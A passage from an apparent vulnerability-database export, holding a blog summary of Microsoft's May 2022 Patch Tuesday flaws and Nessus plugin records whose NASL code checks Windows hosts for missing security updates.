* Critical: 1\n * High: 27\n * Medium: 69\n * Low: 13\n\nThe most dangerous and the only critical vulnerability of this month was actually presented between Patch Tuesdays. **Memory Corruption** in Microsoft Edge/Chromium ([CVE-2022-1364](<https://vulners.com/cve/CVE-2022-1364>)). Exploitation in the wild for this vulnerability was mentioned on [AttackerKB](<https://attackerkb.com/topics/2g85mcptOV/cve-2022-1364>) website and it is also in CISA Known Exploited Vulnerabilities Catalog. "Google is aware that an exploit for this vulnerability exists in the wild". This is a first example of the [new Vulristics functionality](<https://avleonov.com/2022/05/23/vulristics-may-2022-update-cvss-redefinitions-and-bulk-adding-microsoft-products-from-ms-cve-data/>). The CVSS Base Score for this vulnerability was added from a third party site, WhiteSource, because it was not available on NVD.\n\nThe most dangerous and most hyped vulnerability among those that were presented directly on Patch Tuesday day is **Spoofing** in Windows Local Security Authority (LSA) ([CVE-2022-26925](<https://vulners.com/cve/CVE-2022-26925>)). The vulnerability can affect all Windows operating systems from Windows 7 (Windows Server 2008 for server systems) and later. It received a CVSSv3 score of 8.1. However, when chained with a new technology LAN manager (NTLM) relay attack, the combined CVSSv3 score for the attack chain is 9.8. According to the advisory from Microsoft, it has been exploited in the wild as a zero-day. An unauthenticated attacker could force domain controllers to authenticate to an attacker-controller server using NTLM. Raphael John, who has been credited by Microsoft for reporting this vulnerability revealed on Twitter that the vulnerability is actually the bug known as [PetitPotam (CVE-2021-36942)](<https://avleonov.com/2021/08/02/last-weeks-security-news-serious-sam-in-metasploit-petitpotam-zimbra-hijack-joint-advisory-top30-cves/>) from August 2021. "[The story behind CVE-2022-26925](<https://twitter.com/raphajohnsec/status/1524402300625858562>) is no advanced reverse engineering, but a lucky accident. During my pentests in January and March, I saw that PetitPotam worked against the [domain controllers]". It looks like Microsoft failed to properly fix the PetitPotam vulnerability.\n\nThere were 10 **Remote Code Execution** in Windows LDAP this month. But VM vendors specify [CVE-2022-22012](<https://vulners.com/cve/CVE-2022-22012>) and [CVE-2022-29130](<https://vulners.com/cve/CVE-2022-29130>), because of the biggest CVSS Base Scores, 9.8. An unauthenticated attacker could send a specially crafted request to a vulnerable server. Successful exploitation could result in the attacker\u2019s code running in the context of the SYSTEM account. This vulnerability is only exploitable if the MaxReceiveBuffer LDAP policy is set to a value higher than the default value. Systems with the default value of this policy would not be vulnerable.\n\n**Remote Code Execution** in Windows Network File System ([CVE-2022-26937](<https://vulners.com/cve/CVE-2022-26937>)). This vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE). NFS version 4.1 is not impacted by this vulnerability and Microsoft provides the recommended workaround of disabling NFS versions 2 and 3 for those users who are not able to immediately apply the patch. Exploitability Assessment: Exploitation More Likely.\n\n**Remote Code Execution** in Windows Remote Desktop Client ([CVE-2022-22017](<https://vulners.com/cve/CVE-2022-22017>)). An attacker would have to convince a targeted user to connect to a malicious RDP server. Upon connecting, the malicious server could execute code on the victim\u2019s system in the context of the targeted user. Exploitability Assessment: Exploitation More Likely.\n\n**Elevation of Privilege** in Windows Print Spooler ([CVE-2022-29104](<https://vulners.com/cve/CVE-2022-29104>), [CVE-2022-29132](<https://vulners.com/cve/CVE-2022-29132>)). These are just the latest in a long line of EoP vulnerabilities Microsoft has addressed in Print Spooler over the last year, several of which have been exploited in attacks.\n\nAn interesting situation has developed around **Elevation of Privilege** in Kerberos ([CVE-2022-26931](<https://vulners.com/cve/CVE-2022-26931>)) and **Elevation of Privilege** in Active Directory ([CVE-2022-26923](<https://vulners.com/cve/CVE-2022-26923>)). Patches for these vulnerabilities caused [service authentication problems](<https://www.bleepingcomputer.com/news/microsoft/microsoft-may-windows-updates-cause-ad-authentication-failures/>) when deployed on Windows Server domain controllers. But within a week the problem was resolved. Microsoft released workaround and additional [updates for domain controllers](<https://docs.microsoft.com/en-us/windows/release-health/status-windows-11-21h2#you-might-see-authentication-failures-on-the-server-or-client-for-services>).\n\nAll vulnerabilities in this episode do not have a public exploit, but there are some that have a mark about "Proof-of-Concept Exploit" in the Microsoft CVSS Temporal Score. Therefore, it is more likely that exploits for them will appear soon.\n\n * **Spoofing** - Microsoft Edge ([CVE-2022-29147](<https://vulners.com/cve/CVE-2022-29147>))\n * **Denial of Service** - Windows Hyper-V ([CVE-2022-22713](<https://vulners.com/cve/CVE-2022-22713>))\n * **Information Disclosure** - Windows Clustered Shared Volume ([CVE-2022-29123](<https://vulners.com/cve/CVE-2022-29123>))\n\nThe full report is available here: [ms_patch_tuesday_may2022_report](<http://avleonov.com/vulristics_reports/ms_patch_tuesday_may2022_report_with_comments_ext_img.html>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-26T21:21:57", "type": "avleonov", "title": "Microsoft Patch Tuesday May 2022: Edge RCE, PetitPotam LSA Spoofing, bad patches", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942", "CVE-2022-1364", "CVE-2022-22012", "CVE-2022-22017", "CVE-2022-22713", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26931", "CVE-2022-26937", "CVE-2022-29104", "CVE-2022-29123", "CVE-2022-29130", "CVE-2022-29132", "CVE-2022-29147"], "modified": "2022-05-26T21:21:57", "id": "AVLEONOV:8FE7F4C2B563A2A88EB2DA8822A13824", "href": "https://avleonov.com/2022/05/27/microsoft-patch-tuesday-may-2022-edge-rce-petitpotam-lsa-spoofing-bad-patches/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-20T08:16:37", "description": "The remote Windows host is missing security update 5013963. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability (CVE-2022-22019)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013963: Windows 10 LTS 1507 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29112", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29121", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29132", "CVE-2022-29137", "CVE-2022-29139", "CVE-2022-29141", "CVE-2022-30130", "CVE-2022-30138"], "modified": "2022-11-18T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013963.NASL", "href": "https://www.tenable.com/plugins/nessus/160926", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160926);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/11/18\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22011\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29105\",\n \"CVE-2022-29112\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29121\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29132\",\n \"CVE-2022-29137\",\n \"CVE-2022-29139\",\n \"CVE-2022-29141\",\n \"CVE-2022-30130\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013963\");\n script_xref(name:\"MSFT\", value:\"MS22-5013963\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0202-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013963: Windows 10 LTS 1507 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013963. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\n - Remote Procedure Call Runtime Remote Code Execution Vulnerability (CVE-2022-22019)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5013963\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5013963\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5013963'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n os_build:10240,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5013963])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-20T14:26:42", "description": "The remote Windows host is missing security update 5014001. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5014001: Windows Server 2012 R2 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22011", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26937", "CVE-2022-29102", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29105", "CVE-2022-29112", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29120", "CVE-2022-29121", "CVE-2022-29122", "CVE-2022-29123", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29132", "CVE-2022-29134", "CVE-2022-29135", "CVE-2022-29137", "CVE-2022-29138", "CVE-2022-29139", "CVE-2022-29141", "CVE-2022-29150", "CVE-2022-29151", "CVE-2022-30138"], "modified": "2022-10-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5014001.NASL", "href": "https://www.tenable.com/plugins/nessus/160931", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160931);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/10/14\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22011\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-26937\",\n \"CVE-2022-29102\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29105\",\n \"CVE-2022-29112\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29120\",\n \"CVE-2022-29121\",\n \"CVE-2022-29122\",\n \"CVE-2022-29123\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29132\",\n \"CVE-2022-29134\",\n \"CVE-2022-29135\",\n \"CVE-2022-29137\",\n \"CVE-2022-29138\",\n \"CVE-2022-29139\",\n \"CVE-2022-29141\",\n \"CVE-2022-29150\",\n \"CVE-2022-29151\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5014001\");\n script_xref(name:\"MSKB\", value:\"5014011\");\n script_xref(name:\"MSFT\", value:\"MS22-5014001\");\n script_xref(name:\"MSFT\", value:\"MS22-5014011\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5014001: Windows Server 2012 R2 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5014001. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Network File System Remote Code Execution Vulnerability (CVE-2022-26937)\n\n - Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014001\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/help/5014011\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5014001 or Cumulative Update 5014011\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-29130\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/05/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-05';\nkbs = make_list(\n '5014011',\n '5014001'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'05_2022',\n bulletin:bulletin,\n rollup_kb_list:[5014011, 5014001])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-19T18:34:30", "description": "The remote Windows host is missing security update 5013943. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014, CVE-2022-29128, CVE-2022-29129, CVE-2022-29130, CVE-2022-29131, CVE-2022-29137, CVE-2022-29139, CVE-2022-29141)\n\n - Windows Kernel Elevation of Privilege Vulnerability (CVE-2022-29133)\n\n - Windows Graphics Component Remote Code Execution Vulnerability (CVE-2022-26927)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-10T00:00:00", "type": "nessus", "title": "KB5013943: Windows 11 Security Update (May 2022)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21972", "CVE-2022-22012", "CVE-2022-22013", "CVE-2022-22014", "CVE-2022-22015", "CVE-2022-22016", "CVE-2022-22017", "CVE-2022-22019", "CVE-2022-23270", "CVE-2022-23279", "CVE-2022-24466", "CVE-2022-26913", "CVE-2022-26923", "CVE-2022-26925", "CVE-2022-26926", "CVE-2022-26927", "CVE-2022-26930", "CVE-2022-26931", "CVE-2022-26933", "CVE-2022-26934", "CVE-2022-26935", "CVE-2022-26936", "CVE-2022-26940", "CVE-2022-29103", "CVE-2022-29104", "CVE-2022-29112", "CVE-2022-29113", "CVE-2022-29114", "CVE-2022-29115", "CVE-2022-29116", "CVE-2022-29121", "CVE-2022-29125", "CVE-2022-29126", "CVE-2022-29127", "CVE-2022-29128", "CVE-2022-29129", "CVE-2022-29130", "CVE-2022-29131", "CVE-2022-29132", "CVE-2022-29133", "CVE-2022-29137", "CVE-2022-29139", "CVE-2022-29140", "CVE-2022-29141", "CVE-2022-30138"], "modified": "2022-10-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_MAY_5013943.NASL", "href": "https://www.tenable.com/plugins/nessus/160930", "sourceData": "##\n# (C) Tenable, Inc.\n\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(160930);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/10/14\");\n\n script_cve_id(\n \"CVE-2022-21972\",\n \"CVE-2022-22012\",\n \"CVE-2022-22013\",\n \"CVE-2022-22014\",\n \"CVE-2022-22015\",\n \"CVE-2022-22016\",\n \"CVE-2022-22017\",\n \"CVE-2022-22019\",\n \"CVE-2022-23270\",\n \"CVE-2022-23279\",\n \"CVE-2022-24466\",\n \"CVE-2022-26913\",\n \"CVE-2022-26923\",\n \"CVE-2022-26925\",\n \"CVE-2022-26926\",\n \"CVE-2022-26927\",\n \"CVE-2022-26930\",\n \"CVE-2022-26931\",\n \"CVE-2022-26933\",\n \"CVE-2022-26934\",\n \"CVE-2022-26935\",\n \"CVE-2022-26936\",\n \"CVE-2022-26940\",\n \"CVE-2022-29103\",\n \"CVE-2022-29104\",\n \"CVE-2022-29112\",\n \"CVE-2022-29113\",\n \"CVE-2022-29114\",\n \"CVE-2022-29115\",\n \"CVE-2022-29116\",\n \"CVE-2022-29121\",\n \"CVE-2022-29125\",\n \"CVE-2022-29126\",\n \"CVE-2022-29127\",\n \"CVE-2022-29128\",\n \"CVE-2022-29129\",\n \"CVE-2022-29130\",\n \"CVE-2022-29131\",\n \"CVE-2022-29132\",\n \"CVE-2022-29133\",\n \"CVE-2022-29137\",\n \"CVE-2022-29139\",\n \"CVE-2022-29140\",\n \"CVE-2022-29141\",\n \"CVE-2022-30138\"\n );\n script_xref(name:\"MSKB\", value:\"5013943\");\n script_xref(name:\"MSFT\", value:\"MS22-5013943\");\n script_xref(name:\"IAVA\", value:\"2022-A-0204-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0203-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/22\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/09/08\");\n\n script_name(english:\"KB5013943: Windows 11 Security Update (May 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5013943. It is, therefore, affected by multiple vulnerabilities\n\n - Windows LDAP Remote Code Execution Vulnerability (CVE-2022-22012, CVE-2022-22013, CVE-2022-22014,\n CVE-2022-29128, CVE-2022-29129, 